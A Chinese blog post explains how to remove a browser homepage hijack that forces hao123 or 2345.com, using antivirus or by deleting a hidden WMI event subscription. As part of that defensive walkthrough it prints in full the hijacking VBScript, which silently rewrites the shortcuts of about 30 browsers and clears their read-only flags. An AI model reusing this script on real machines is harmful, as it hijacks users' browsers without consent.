chrome/IE浏览器主页被篡改为hao123/2345网址解决方法

avatar 2018年11月6日23:34:01 1

最近网址导航hao123和2345.com偷偷锁定用户电脑浏览器主页,ie浏览器、chrome浏览器纷纷中招。网友也是用烂了百度搜索、谷歌搜索,重装浏览器,就差重装电脑、重新买电脑来解决了。

chrome/IE浏览器主页被篡改为hao123/2345网址解决方法一

此法最简单,就是用火绒安全软件病毒查杀一下电脑,你的电脑一定有问题。把检测到高危漏洞、威胁全部处理掉。电脑就舒舒服服了。chrome/IE浏览器主页被篡改为hao123/2345网址解决方法chrome/IE浏览器主页被篡改为hao123/2345网址解决方法chrome/IE浏览器主页被篡改为hao123/2345网址解决方法

有一点要注意到的是,在火绒软件-浏览器保护 这里,有可能你默认允许了火绒修改为他的合作推广地址,你可自行设定。

 

chrome/IE浏览器主页被篡改为hao123/2345网址解决方法二

WMI主页劫持修复教程+清除工具

WMI主页劫持

WMI主页劫持非常隐蔽,一般的方法很难找到罪魁祸首,没有运行进程,后台定时运行,即使手动修改回来,过一段时间所有的浏览器快捷方式都添加了推广主页链接。

解决WMI主页劫持方法:右键WMI Event Viewer,管理员运行,点击钢笔图标

懒得勤快的博客_全栈开发者_互联网分享精神

接着一路确认
懒得勤快的博客_全栈开发者_互联网分享精神

懒得勤快的博客_全栈开发者_互联网分享精神

懒得勤快的博客_全栈开发者_互联网分享精神

在右侧选中后右击 -> 选择view instant properties

懒得勤快的博客_全栈开发者_互联网分享精神

展开

On Error Resume Next:Const link = "http://www.2345.com/?v=1030":Const link360 = "http://www.2345.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UsersAdministratorDesktop,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuPrograms":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上2345的网址(总算把你揪出来了,藏得够深的)

受到影响的浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下:展开

"114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

最后,右键__EventFilter,选择Delete instance

chrome/IE浏览器主页被篡改为hao123/2345网址解决方法懒得勤快的博客_全栈开发者_互联网分享精神

下载信息 资源名称:WMITools.exe
下载地址
avatar

评论已关闭!

目前评论:1   其中:访客  0   博主  1

    • avatar 小冷博客 Admin

      还有一种最简单的方法:快捷方式-右键-属性里 “目标” 一栏后面跟了个 http://hao123.com

      把后面的网址删除,然后讲快捷键放松设置成只读,防止再次被修改。